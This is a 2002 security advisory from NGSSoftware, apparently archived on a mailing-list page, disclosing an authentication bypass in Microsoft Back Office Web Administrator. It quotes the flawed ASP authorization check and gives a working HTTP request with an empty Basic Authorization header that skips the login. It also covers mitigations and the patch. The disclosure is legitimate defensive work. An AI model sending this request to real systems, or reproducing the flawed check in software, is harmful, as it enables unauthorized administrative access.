OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: NGSSoftware Insight Security Research (nisrngssoftware.com)
Date: Tue Apr 16 2002 - 09:08:47 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    NGSSoftware Insight Security Research Advisory

    Name: Back Office Web Administration Authentication Bypass
    Systems Affected: Microsoft's Back Office Web Administrator 4.0, 4.5
    Severity: Medium/High
    Vendor URL: http://www.microsoft.com
    Author: David Litchfield (davidngssoftware.com)
    Date: 17th April 2002
    Advisory number: #NISR17042002A
    Advisory URL: http://www.ngssoftware.com/advisories/boa.txt

    Issue: Attackers can bypass the logon page and access the Back Office Web
    Administrator

    Description
    ***********
    With the Microsoft Back Office suite of products comes a web based
    administration ASP based application that runs on IIS. Normally, to use the
    administration pages a user must authenticate but NGSSoftware have
    discovered that it is trivial to bypass this.

    Details
    *******
    Each of the Back Office Web Administrator ASP pages checks to see if the
    user has been authenticated but does this with the following snippet of code

     If Request.ServerVariables("auth_type") = "" Then
      Response.Status = "401 ACCESS DENIED"
      Response.End
     End If

    This is the only "authorization/authentication" performed. As such it's
    trivial to bypass:

     GET /BOADMIN/BACKOFFICE/SERVICES.ASP HTTP/1.1
     Host: hostname
     Authorization: Basic
     [enter]
     [enter]

    No credentials are required as, technically the auth_type envariable has
    been set, regardless of whether a user name or password have been supplied.

    Risk and Mitigating Factors
    ***************************
    By default the Back Office Web Administrator is limited to the loopback
    address (127.0.0.1) which means that it can't be accessed remotely. However,
    it is not uncommon to change this to allow for remote administration; tying
    the Administrator to the loopback address makes it somewhat useless.

    Basic authentication also needs to be enabled which, again, is not uncommon.

    Fix Information
    ***************
    For those that match this criteria they are strongly urged to obtain the the
    patch from Microsoft. Please see
    http://support.microsoft.com/default.aspx?scid=kb;en-us;Q316838& for more
    details.

    A check for this issue has also been added to Typhon II, NGSSoftware's
    vulnerabilty assessment scanner. For more information about Typhon, please
    see the NGSSite http://www.ngssoftware.com/.